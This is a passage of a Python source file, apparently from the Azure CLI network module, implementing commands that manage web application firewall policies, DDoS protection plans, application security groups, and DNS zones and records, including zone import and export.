"""
Initialize a custom rule for a WAF policy.
"""
WebApplicationFirewallCustomRule = cmd.get_models('WebApplicationFirewallCustomRule')
waf_policy = client.get(resource_group_name, policy_name)
new_custom_rule = WebApplicationFirewallCustomRule(
name=rule_name,
action=action,
match_conditions=[],
priority=priority,
rule_type=rule_type
)
upsert_to_collection(waf_policy, 'custom_rules', new_custom_rule, 'name')
parent = client.create_or_update(resource_group_name, policy_name, waf_policy)
return find_child_item(parent, rule_name, path='custom_rules', key_path='name')
# pylint: disable=unused-argument
def update_waf_custom_rule(instance, parent, cmd, rule_name, priority=None, rule_type=None, action=None):
with cmd.update_context(instance) as c:
c.set_param('priority', priority)
c.set_param('rule_type', rule_type)
c.set_param('action', action)
return parent
def show_waf_custom_rule(cmd, client, resource_group_name, policy_name, rule_name):
waf_policy = client.get(resource_group_name, policy_name)
return find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
def list_waf_custom_rules(cmd, client, resource_group_name, policy_name):
return client.get(resource_group_name, policy_name).custom_rules
def delete_waf_custom_rule(cmd, client, resource_group_name, policy_name, rule_name, no_wait=None):
waf_policy = client.get(resource_group_name, policy_name)
rule = find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
waf_policy.custom_rules.remove(rule)
sdk_no_wait(no_wait, client.create_or_update, resource_group_name, policy_name, waf_policy)
# endregion
# region ApplicationGatewayWAFPolicyRuleMatchConditions
def add_waf_custom_rule_match_cond(cmd, client, resource_group_name, policy_name, rule_name,
match_variables, operator, match_values, negation_condition=None, transforms=None):
MatchCondition = cmd.get_models('MatchCondition')
waf_policy = client.get(resource_group_name, policy_name)
custom_rule = find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
new_cond = MatchCondition(
match_variables=match_variables,
operator=operator,
match_values=match_values,
negation_conditon=negation_condition,
transforms=transforms
)
custom_rule.match_conditions.append(new_cond)
upsert_to_collection(waf_policy, 'custom_rules', custom_rule, 'name', warn=False)
client.create_or_update(resource_group_name, policy_name, waf_policy)
return new_cond
def list_waf_custom_rule_match_cond(cmd, client, resource_group_name, policy_name, rule_name):
waf_policy = client.get(resource_group_name, policy_name)
return find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name').match_conditions
def remove_waf_custom_rule_match_cond(cmd, client, resource_group_name, policy_name, rule_name, index):
waf_policy = client.get(resource_group_name, policy_name)
rule = find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
rule.match_conditions.pop(index)
client.create_or_update(resource_group_name, policy_name, waf_policy)
# endregion
# region ApplicationGatewayWAFPolicy ManagedRule ManagedRuleSet
def add_waf_managed_rule_set(cmd, client, resource_group_name, policy_name,
rule_set_type, rule_set_version,
rule_group_name=None, rules=None):
"""
Add a managed rule set to the WAF policy's managed rules.
Visit: https://docs.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules
"""
ManagedRuleSet, ManagedRuleGroupOverride, ManagedRuleOverride = \
cmd.get_models('ManagedRuleSet', 'ManagedRuleGroupOverride', 'ManagedRuleOverride')
waf_policy = client.get(resource_group_name, policy_name)
managed_rule_overrides = [ManagedRuleOverride(rule_id=r) for r in rules] if rules is not None else []
rule_group_override = None
if rule_group_name is not None:
rule_group_override = ManagedRuleGroupOverride(rule_group_name=rule_group_name,
rules=managed_rule_overrides)
new_managed_rule_set = ManagedRuleSet(rule_set_type=rule_set_type,
rule_set_version=rule_set_version,
rule_group_overrides=[rule_group_override] if rule_group_override is not None else []) # pylint: disable=line-too-long
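# for/else: merge into an existing rule set of the same type/version when possible;
# the else branch appends a brand-new rule set only if none matched.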
for rule_set in waf_policy.managed_rules.managed_rule_sets:
if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version == rule_set_version:
for rule_override in rule_set.rule_group_overrides:
if rule_override.rule_group_name == rule_group_name:
# Add one rule
rule_override.rules.extend(managed_rule_overrides)
break
else:
# Add one rule group
if rule_group_override is not None:
rule_set.rule_group_overrides.append(rule_group_override)
break
else:
# Add new rule set
waf_policy.managed_rules.managed_rule_sets.append(new_managed_rule_set)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def update_waf_managed_rule_set(cmd, instance, rule_set_type, rule_set_version, rule_group_name=None, rules=None):
"""
Update (override) an existing managed rule set of the WAF policy's managed rules.
"""
ManagedRuleSet, ManagedRuleGroupOverride, ManagedRuleOverride = \
cmd.get_models('ManagedRuleSet', 'ManagedRuleGroupOverride', 'ManagedRuleOverride')
managed_rule_overrides = [ManagedRuleOverride(rule_id=r) for r in rules] if rules else None
rule_group_override = ManagedRuleGroupOverride(rule_group_name=rule_group_name,
rules=managed_rule_overrides) if managed_rule_overrides else None
new_managed_rule_set = ManagedRuleSet(rule_set_type=rule_set_type,
rule_set_version=rule_set_version,
rule_group_overrides=[rule_group_override] if rule_group_override is not None else []) # pylint: disable=line-too-long
updated_rule_set = None
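# A version change or a full-set update replaces the whole rule set;
# a group-level update modifies the matching rule group override in place.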
for rule_set in instance.managed_rules.managed_rule_sets:
if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version != rule_set_version:
updated_rule_set = rule_set
break
if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version == rule_set_version:
if rule_group_name is None:
updated_rule_set = rule_set
break
rg = next((rg for rg in rule_set.rule_group_overrides if rg.rule_group_name == rule_group_name), None)
if rg:
rg.rules = managed_rule_overrides # differentiate with add_waf_managed_rule_set()
else:
rule_set.rule_group_overrides.append(rule_group_override)
if updated_rule_set:
instance.managed_rules.managed_rule_sets.remove(updated_rule_set)
instance.managed_rules.managed_rule_sets.append(new_managed_rule_set)
return instance
def remove_waf_managed_rule_set(cmd, client, resource_group_name, policy_name,
rule_set_type, rule_set_version, rule_group_name=None):
"""
Remove a rule group override from a managed rule set if rule_group_name is specified. Otherwise, remove the entire managed rule set.
"""
waf_policy = client.get(resource_group_name, policy_name)
delete_rule_set = None
for rule_set in waf_policy.managed_rules.managed_rule_sets:
if rule_set.rule_set_type == rule_set_type or rule_set.rule_set_version == rule_set_version:
if rule_group_name is None:
delete_rule_set = rule_set
break
# Remove one rule from rule group
rg = next((rg for rg in rule_set.rule_group_overrides if rg.rule_group_name == rule_group_name), None)
if rg is None:
raise CLIError('Rule set group [ {} ] not found.'.format(rule_group_name))
rule_set.rule_group_overrides.remove(rg)
if delete_rule_set:
waf_policy.managed_rules.managed_rule_sets.remove(delete_rule_set)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def list_waf_managed_rule_set(cmd, client, resource_group_name, policy_name):
waf_policy = client.get(resource_group_name, policy_name)
return waf_policy.managed_rules
# endregion
# region ApplicationGatewayWAFPolicy ManagedRule OwaspCrsExclusionEntry
def add_waf_managed_rule_exclusion(cmd, client, resource_group_name, policy_name,
match_variable, selector_match_operator, selector):
OwaspCrsExclusionEntry = cmd.get_models('OwaspCrsExclusionEntry')
exclusion_entry = OwaspCrsExclusionEntry(match_variable=match_variable,
selector_match_operator=selector_match_operator,
selector=selector)
waf_policy = client.get(resource_group_name, policy_name)
waf_policy.managed_rules.exclusions.append(exclusion_entry)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def remove_waf_managed_rule_exclusion(cmd, client, resource_group_name, policy_name):
waf_policy = client.get(resource_group_name, policy_name)
waf_policy.managed_rules.exclusions = []
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def list_waf_managed_rule_exclusion(cmd, client, resource_group_name, policy_name):
waf_policy = client.get(resource_group_name, policy_name)
return waf_policy.managed_rules
# endregion
# region ApplicationSecurityGroups
def create_asg(cmd, client, resource_group_name, application_security_group_name, location=None, tags=None):
ApplicationSecurityGroup = cmd.get_models('ApplicationSecurityGroup')
asg = ApplicationSecurityGroup(location=location, tags=tags)
return client.begin_create_or_update(resource_group_name, application_security_group_name, asg)
def update_asg(instance, tags=None):
if tags is not None:
instance.tags = tags
return instance
# endregion
# region DdosProtectionPlans
def create_ddos_plan(cmd, resource_group_name, ddos_plan_name, location=None, tags=None, vnets=None):
from azure.cli.core.commands import LongRunningOperation
ddos_client = network_client_factory(cmd.cli_ctx).ddos_protection_plans
ddos_protection_plan = cmd.get_models('DdosProtectionPlan')()
if location:
ddos_protection_plan.location = location
if tags:
ddos_protection_plan.tags = tags
if not vnets:
# if no VNets are specified, a simple PUT is enough
return ddos_client.begin_create_or_update(resource_group_name, ddos_plan_name, parameters=ddos_protection_plan)
# if VNets are specified, create the protection plan first and then attach the VNets to it
plan_id = LongRunningOperation(cmd.cli_ctx)(
ddos_client.begin_create_or_update(resource_group_name, ddos_plan_name, parameters=ddos_protection_plan)).id
SubResource = cmd.get_models('SubResource')
logger.info('Attempting to attach VNets to newly created DDoS protection plan.')
for vnet_subresource in vnets:
vnet_client = network_client_factory(cmd.cli_ctx).virtual_networks
id_parts = parse_resource_id(vnet_subresource.id)
vnet = vnet_client.get(id_parts['resource_group'], id_parts['name'])
vnet.ddos_protection_plan = SubResource(id=plan_id)
vnet_client.begin_create_or_update(id_parts['resource_group'], id_parts['name'], vnet)
return ddos_client.get(resource_group_name, ddos_plan_name)
def update_ddos_plan(cmd, instance, tags=None, vnets=None):
SubResource = cmd.get_models('SubResource')
if tags is not None:
instance.tags = tags
if vnets is not None:
logger.info('Attempting to update the VNets attached to the DDoS protection plan.')
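# A single empty entry means "detach every VNet"; otherwise the supplied VNets become
# the desired set and the difference against the existing attachments is applied below.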
vnet_ids = set([])
if len(vnets) == 1 and not vnets[0]:
pass
else:
vnet_ids = {x.id for x in vnets}
existing_vnet_ids = {x.id for x in instance.virtual_networks} if instance.virtual_networks else set([])
client = network_client_factory(cmd.cli_ctx).virtual_networks
for vnet_id in vnet_ids.difference(existing_vnet_ids):
logger.info("Adding VNet '%s' to plan.", vnet_id)
id_parts = parse_resource_id(vnet_id)
vnet = client.get(id_parts['resource_group'], id_parts['name'])
vnet.ddos_protection_plan = SubResource(id=instance.id)
client.begin_create_or_update(id_parts['resource_group'], id_parts['name'], vnet)
for vnet_id in existing_vnet_ids.difference(vnet_ids):
logger.info("Removing VNet '%s' from plan.", vnet_id)
id_parts = parse_resource_id(vnet_id)
vnet = client.get(id_parts['resource_group'], id_parts['name'])
vnet.ddos_protection_plan = None
client.begin_create_or_update(id_parts['resource_group'], id_parts['name'], vnet)
return instance
def list_ddos_plans(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).ddos_protection_plans
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
# endregion
# region DNS Commands
# add a delegation NS record for the newly created child zone in its parent zone.
def add_dns_delegation(cmd, child_zone, parent_zone, child_rg, child_zone_name):
"""
:param child_zone: the zone object corresponding to the child that is created.
:param parent_zone: the resource ID or the name/FQDN of the parent zone.
If only the parent zone name is given, the current subscription and the child's resource group are assumed.
:param child_rg: resource group of the child zone
:param child_zone_name: name of the child zone
"""
import sys
from azure.core.exceptions import HttpResponseError
parent_rg = child_rg
parent_subscription_id = None
parent_zone_name = parent_zone
if is_valid_resource_id(parent_zone):
id_parts = parse_resource_id(parent_zone)
parent_rg = id_parts['resource_group']
parent_subscription_id = id_parts['subscription']
parent_zone_name = id_parts['name']
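# Only add NS delegation records when the child zone is actually a subdomain of the parent zone.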
if all([parent_zone_name, parent_rg, child_zone_name, child_zone]) and child_zone_name.endswith(parent_zone_name):
record_set_name = child_zone_name.replace('.' + parent_zone_name, '')
try:
for dname in child_zone.name_servers:
add_dns_ns_record(cmd, parent_rg, parent_zone_name, record_set_name, dname, parent_subscription_id)
print('Delegation added successfully in \'{}\'\n'.format(parent_zone_name), file=sys.stderr)
except HttpResponseError as ex:
logger.error(ex)
print('Could not add delegation in \'{}\'\n'.format(parent_zone_name), file=sys.stderr)
def create_dns_zone(cmd, client, resource_group_name, zone_name, parent_zone_name=None, tags=None,
if_none_match=False, zone_type='Public', resolution_vnets=None, registration_vnets=None):
Zone = cmd.get_models('Zone', resource_type=ResourceType.MGMT_NETWORK_DNS)
zone = Zone(location='global', tags=tags)
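# zone_type and virtual-network link properties exist only on Zone models from API
# versions that support them, hence the hasattr guard below.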
if hasattr(zone, 'zone_type'):
zone.zone_type = zone_type
zone.registration_virtual_networks = registration_vnets
zone.resolution_virtual_networks = resolution_vnets
created_zone = client.create_or_update(resource_group_name, zone_name, zone,
if_none_match='*' if if_none_match else None)
if cmd.supported_api_version(min_api='2016-04-01') and parent_zone_name is not None:
logger.info('Attempting to add delegation in the parent zone')
add_dns_delegation(cmd, created_zone, parent_zone_name, resource_group_name, zone_name)
return created_zone
def update_dns_zone(instance, tags=None, zone_type=None, resolution_vnets=None, registration_vnets=None):
if tags is not None:
instance.tags = tags
if zone_type:
instance.zone_type = zone_type
if resolution_vnets == ['']:
instance.resolution_virtual_networks = None
elif resolution_vnets:
instance.resolution_virtual_networks = resolution_vnets
if registration_vnets == ['']:
instance.registration_virtual_networks = None
elif registration_vnets:
instance.registration_virtual_networks = registration_vnets
return instance
def list_dns_zones(cmd, resource_group_name=None):
ncf = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS).zones
if resource_group_name:
return ncf.list_by_resource_group(resource_group_name)
return ncf.list()
def create_dns_record_set(cmd, resource_group_name, zone_name, record_set_name, record_set_type,
metadata=None, if_match=None, if_none_match=None, ttl=3600, target_resource=None):
RecordSet = cmd.get_models('RecordSet', resource_type=ResourceType.MGMT_NETWORK_DNS)
SubResource = cmd.get_models('SubResource', resource_type=ResourceType.MGMT_NETWORK)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS).record_sets
record_set = RecordSet(
ttl=ttl,
metadata=metadata,
target_resource=SubResource(id=target_resource) if target_resource else None
)
return client.create_or_update(resource_group_name, zone_name, record_set_name,
record_set_type, record_set, if_match=if_match,
if_none_match='*' if if_none_match else None)
def list_dns_record_set(client, resource_group_name, zone_name, record_type=None):
if record_type:
return client.list_by_type(resource_group_name, zone_name, record_type)
return client.list_by_dns_zone(resource_group_name, zone_name)
def update_dns_record_set(instance, cmd, metadata=None, target_resource=None):
if metadata is not None:
instance.metadata = metadata
if target_resource == '':
instance.target_resource = None
elif target_resource is not None:
SubResource = cmd.get_models('SubResource')
instance.target_resource = SubResource(id=target_resource)
return instance
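# Map a DNS record type to the attribute name used on the RecordSet model;
# note that SPF data is stored in txt_records.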
def _type_to_property_name(key):
type_dict = {
'a': 'a_records',
'aaaa': 'aaaa_records',
'caa': 'caa_records',
'cname': 'cname_record',
'mx': 'mx_records',
'ns': 'ns_records',
'ptr': 'ptr_records',
'soa': 'soa_record',
'spf': 'txt_records',
'srv': 'srv_records',
'txt': 'txt_records',
}
return type_dict[key.lower()]
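# e.g. _type_to_property_name('A') -> 'a_records', _type_to_property_name('SPF') -> 'txt_records'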
def export_zone(cmd, resource_group_name, zone_name, file_name=None):
from time import localtime, strftime
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS)
record_sets = client.record_sets.list_by_dns_zone(resource_group_name, zone_name)
zone_obj = OrderedDict({
'$origin': zone_name.rstrip('.') + '.',
'resource-group': resource_group_name,
'zone-name': zone_name.rstrip('.'),
'datetime': strftime('%a, %d %b %Y %X %z', localtime())
})
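# Build zone_obj keyed by record set name, then record type; make_zone_file() renders it
# as zone-file text, which is printed and optionally written to disk.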
for record_set in record_sets:
record_type = record_set.type.rsplit('/', 1)[1].lower()
record_set_name = record_set.name
record_data = getattr(record_set, _type_to_property_name(record_type), None)
# ignore empty record sets
if not record_data:
continue
if not isinstance(record_data, list):
record_data = [record_data]
if record_set_name not in zone_obj:
zone_obj[record_set_name] = OrderedDict()
for record in record_data:
record_obj = {'ttl': record_set.ttl}
if record_type not in zone_obj[record_set_name]:
zone_obj[record_set_name][record_type] = []
if record_type == 'aaaa':
record_obj.update({'ip': record.ipv6_address})
elif record_type == 'a':
record_obj.update({'ip': record.ipv4_address})
elif record_type == 'caa':
record_obj.update({'val': record.value, 'tag': record.tag, 'flags': record.flags})
elif record_type == 'cname':
record_obj.update({'alias': record.cname.rstrip('.') + '.'})
elif record_type == 'mx':
record_obj.update({'preference': record.preference, 'host': record.exchange.rstrip('.') + '.'})
elif record_type == 'ns':
record_obj.update({'host': record.nsdname.rstrip('.') + '.'})
elif record_type == 'ptr':
record_obj.update({'host': record.ptrdname.rstrip('.') + '.'})
elif record_type == 'soa':
record_obj.update({
'mname': record.host.rstrip('.') + '.',
'rname': record.email.rstrip('.') + '.',
'serial': int(record.serial_number), 'refresh': record.refresh_time,
'retry': record.retry_time, 'expire': record.expire_time,
'minimum': record.minimum_ttl
})
zone_obj['$ttl'] = record.minimum_ttl
elif record_type == 'srv':
record_obj.update({'priority': record.priority, 'weight': record.weight,
'port': record.port, 'target': record.target.rstrip('.') + '.'})
elif record_type == 'txt':
record_obj.update({'txt': ''.join(record.value)})
zone_obj[record_set_name][record_type].append(record_obj)
zone_file_content = make_zone_file(zone_obj)
print(zone_file_content)
if file_name:
try:
with open(file_name, 'w') as f:
f.write(zone_file_content)
except IOError:
raise CLIError('Unable to export to file: {}'.format(file_name))
# pylint: disable=too-many-return-statements, inconsistent-return-statements
def _build_record(cmd, data):
AaaaRecord, ARecord, CaaRecord, CnameRecord, MxRecord, NsRecord, PtrRecord, SoaRecord, SrvRecord, TxtRecord = \
cmd.get_models('AaaaRecord', 'ARecord', 'CaaRecord', 'CnameRecord', 'MxRecord', 'NsRecord',
'PtrRecord', 'SoaRecord', 'SrvRecord', 'TxtRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record_type = data['delim'].lower()
try:
if record_type == 'aaaa':
return AaaaRecord(ipv6_address=data['ip'])
if record_type == 'a':
return ARecord(ipv4_address=data['ip'])
if (record_type == 'caa' and
supported_api_version(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS, min_api='2018-03-01-preview')):
return CaaRecord(value=data['val'], flags=int(data['flags']), tag=data['tag'])
if record_type == 'cname':
return CnameRecord(cname=data['alias'])
if record_type == 'mx':
return MxRecord(preference=data['preference'], exchange=data['host'])
if record_type == 'ns':
return NsRecord(nsdname=data['host'])
if record_type == 'ptr':
return PtrRecord(ptrdname=data['host'])
if record_type == 'soa':
return SoaRecord(host=data['host'], email=data['email'], serial_number=data['serial'],
refresh_time=data['refresh'], retry_time=data['retry'], expire_time=data['expire'],
minimum_ttl=data['minimum'])
if record_type == 'srv':
return SrvRecord(
priority=int(data['priority']), weight=int(data['weight']), port=int(data['port']),
target=data['target'])
if record_type in ['txt', 'spf']:
text_data = data['txt']
return TxtRecord(value=text_data) if isinstance(text_data, list) else TxtRecord(value=[text_data])
except KeyError as ke:
raise CLIError("The {} record '{}' is missing a property. {}"
.format(record_type, data['name'], ke))
# pylint: disable=too-many-statements
def import_zone(cmd, resource_group_name, zone_name, file_name):
from azure.cli.core.util import read_file_content
from azure.core.exceptions import HttpResponseError
import sys
logger.warning("In the future, zone name will be case insensitive.")
RecordSet = cmd.get_models('RecordSet', resource_type=ResourceType.MGMT_NETWORK_DNS)
from azure.cli.core.azclierror import FileOperationError, UnclassifiedUserFault
try:
file_text = read_file_content(file_name)
except FileNotFoundError:
raise FileOperationError("No such file: " + str(file_name))
except IsADirectoryError:
raise FileOperationError("Is a directory: " + str(file_name))
except PermissionError:
raise FileOperationError("Permission denied: " + str(file_name))
except OSError as e:
raise UnclassifiedUserFault(e)
zone_obj = parse_zone_file(file_text, zone_name)
origin = zone_name
record_sets = {}
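# First pass: convert the parsed zone file into RecordSet objects,
# keyed by lower-cased record set name plus record type.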
for record_set_name in zone_obj:
for record_set_type in zone_obj[record_set_name]:
record_set_obj = zone_obj[record_set_name][record_set_type]
if record_set_type == 'soa':
origin = record_set_name.rstrip('.')
if not isinstance(record_set_obj, list):
record_set_obj = [record_set_obj]
for entry in record_set_obj:
record_set_ttl = entry['ttl']
record_set_key = '{}{}'.format(record_set_name.lower(), record_set_type)
record = _build_record(cmd, entry)
if not record:
logger.warning('Cannot import %s. RecordType is not found. Skipping...', entry['delim'].lower())
continue
record_set = record_sets.get(record_set_key, None)
if not record_set:
# Workaround for issue #2824
relative_record_set_name = record_set_name.rstrip('.')
if not relative_record_set_name.endswith(origin):
logger.warning(
'Cannot import %s. Only records relative to origin may be '
'imported at this time. Skipping...', relative_record_set_name)
continue
record_set = RecordSet(ttl=record_set_ttl)
record_sets[record_set_key] = record_set
_add_record(record_set, record, record_set_type,
is_list=record_set_type.lower() not in ['soa', 'cname'])
total_records = 0
for key, rs in record_sets.items():
rs_name, rs_type = key.lower().rsplit('.', 1)
rs_name = rs_name[:-(len(origin) + 1)] if rs_name != origin else '@'
try:
record_count = len(getattr(rs, _type_to_property_name(rs_type)))
except TypeError:
record_count = 1
total_records += record_count
cum_records = 0
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS)
print('== BEGINNING ZONE IMPORT: {} ==\n'.format(zone_name), file=sys.stderr)
Zone = cmd.get_models('Zone', resource_type=ResourceType.MGMT_NETWORK_DNS)
client.zones.create_or_update(resource_group_name, zone_name, Zone(location='global'))
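# Second pass: create each record set, preserving the SOA host and the auto-created
# root NS records of the new zone (only the TTL is taken from the imported file).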
for key, rs in record_sets.items():
rs_name, rs_type = key.lower().rsplit('.', 1)
rs_name = '@' if rs_name == origin else rs_name
if rs_name.endswith(origin):
rs_name = rs_name[:-(len(origin) + 1)]
try:
record_count = len(getattr(rs, _type_to_property_name(rs_type)))
except TypeError:
record_count = 1
if rs_name == '@' and rs_type == 'soa':
root_soa = client.record_sets.get(resource_group_name, zone_name, '@', 'SOA')
rs.soa_record.host = root_soa.soa_record.host
rs_name = '@'
elif rs_name == '@' and rs_type == 'ns':
root_ns = client.record_sets.get(resource_group_name, zone_name, '@', 'NS')
root_ns.ttl = rs.ttl
rs = root_ns
rs_type = rs.type.rsplit('/', 1)[1]
try:
client.record_sets.create_or_update(
resource_group_name, zone_name, rs_name, rs_type, rs)
cum_records += record_count
print("({}/{}) Imported {} records of type '{}' and name '{}'"
.format(cum_records, total_records, record_count, rs_type, rs_name), file=sys.stderr)
except HttpResponseError as ex:
logger.error(ex)
print("\n== {}/{} RECORDS IMPORTED SUCCESSFULLY: '{}' =="
.format(cum_records, total_records, zone_name), file=sys.stderr)
def add_dns_aaaa_record(cmd, resource_group_name, zone_name, record_set_name, ipv6_address,
ttl=3600, if_none_match=None):
AaaaRecord = cmd.get_models('AaaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = AaaaRecord(ipv6_address=ipv6_address)
record_type = 'aaaa'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def add_dns_a_record(cmd, resource_group_name, zone_name, record_set_name, ipv4_address,
ttl=3600, if_none_match=None):
ARecord = cmd.get_models('ARecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = ARecord(ipv4_address=ipv4_address)
record_type = 'a'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name, 'arecords',
ttl=ttl, if_none_match=if_none_match)
def add_dns_caa_record(cmd, resource_group_name, zone_name, record_set_name, value, flags, tag,
ttl=3600, if_none_match=None):
CaaRecord = cmd.get_models('CaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CaaRecord(flags=flags, tag=tag, value=value)
record_type = 'caa'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def add_dns_cname_record(cmd, resource_group_name, zone_name, record_set_name, cname, ttl=3600, if_none_match=None):
CnameRecord = cmd.get_models('CnameRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CnameRecord(cname=cname)
record_type = 'cname'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=False, ttl=ttl, if_none_match=if_none_match)
def add_dns_mx_record(cmd, resource_group_name, zone_name, record_set_name, preference, exchange,
ttl=3600, if_none_match=None):
MxRecord = cmd.get_models('MxRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = MxRecord(preference=int(preference), exchange=exchange)
record_type = 'mx'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def add_dns_ns_record(cmd, resource_group_name, zone_name, record_set_name, dname,
subscription_id=None, ttl=3600, if_none_match=None):
NsRecord = cmd.get_models('NsRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = NsRecord(nsdname=dname)
record_type = 'ns'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
subscription_id=subscription_id, ttl=ttl, if_none_match=if_none_match)
def add_dns_ptr_record(cmd, resource_group_name, zone_name, record_set_name, dname, ttl=3600, if_none_match=None):
PtrRecord = cmd.get_models('PtrRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = PtrRecord(ptrdname=dname)
record_type = 'ptr'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def update_dns_soa_record(cmd, resource_group_name, zone_name, host=None, email=None,
serial_number=None, refresh_time=None, retry_time=None, expire_time=None,
minimum_ttl=3600, if_none_match=None):
record_set_name = '@'
record_type = 'soa'
ncf = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS).record_sets
record_set = ncf.get(resource_group_name, zone_name, record_set_name, record_type)
record = record_set.soa_record
record.host = host or record.host
record.email = email or record.email
record.serial_number = serial_number or record.serial_number
record.refresh_time = refresh_time or record.refresh_time
record.retry_time = retry_time or record.retry_time
record.expire_time = expire_time or record.expire_time
record.minimum_ttl = minimum_ttl or record.minimum_ttl
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=False, if_none_match=if_none_match)
def add_dns_srv_record(cmd, resource_group_name, zone_name, record_set_name, priority, weight,
port, target, if_none_match=None):
SrvRecord = cmd.get_models('SrvRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = SrvRecord(priority=priority, weight=weight, port=port, target=target)
record_type = 'srv'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
if_none_match=if_none_match)
def add_dns_txt_record(cmd, resource_group_name, zone_name, record_set_name, value, if_none_match=None):
TxtRecord = cmd.get_models('TxtRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = TxtRecord(value=value)
record_type = 'txt'
long_text = ''.join(x for x in record.value)
original_len = len(long_text)
record.value = []
while len(long_text) > 255:
record.value.append(long_text[:255])
long_text = long_text[255:]
record.value.append(long_text)
final_str = ''.join(record.value)
final_len = len(final_str)
assert original_len == final_len
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
if_none_match=if_none_match)
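# Note on the splitting above: DNS TXT records limit each character string to 255
# octets, so the joined value is re-chunked before saving. A minimal sketch of the
# same splitting for a 600-character value (illustrative only):
#
#   long_text = 'a' * 600
#   chunks = [long_text[i:i + 255] for i in range(0, len(long_text), 255)]
#   # -> three strings of length 255, 255 and 90; ''.join(chunks) == long_text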
def remove_dns_aaaa_record(cmd, resource_group_name, zone_name, record_set_name, ipv6_address,
keep_empty_record_set=False):
AaaaRecord = cmd.get_models('AaaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = AaaaRecord(ipv6_address=ipv6_address)
record_type = 'aaaa'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_a_record(cmd, resource_group_name, zone_name, record_set_name, ipv4_address,
keep_empty_record_set=False):
ARecord = cmd.get_models('ARecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = ARecord(ipv4_address=ipv4_address)
record_type = 'a'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_caa_record(cmd, resource_group_name, zone_name, record_set_name, value,
flags, tag, keep_empty_record_set=False):
CaaRecord = cmd.get_models('CaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CaaRecord(flags=flags, tag=tag, value=value)
record_type = 'caa'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_cname_record(cmd, resource_group_name, zone_name, record_set_name, cname,
keep_empty_record_set=False):
CnameRecord = cmd.get_models('CnameRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CnameRecord(cname=cname)
record_type = 'cname'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=False, keep_empty_record_set=keep_empty_record_set)
def remove_dns_mx_record(cmd, resource_group_name, zone_name, record_set_name, preference, exchange,
keep_empty_record_set=False):
MxRecord = cmd.get_models('MxRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = MxRecord(preference=int(preference), exchange=exchange)
record_type = 'mx'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_ns_record(cmd, resource_group_name, zone_name, record_set_name, dname,
keep_empty_record_set=False):
NsRecord = cmd.get_models('NsRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = NsRecord(nsdname=dname)
record_type = 'ns'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_ptr_record(cmd, resource_group_name, zone_name, record_set_name, dname,
keep_empty_record_set=False):
PtrRecord = cmd.get_models('PtrRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = PtrRecord(ptrdname=dname)
record_type = 'ptr'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
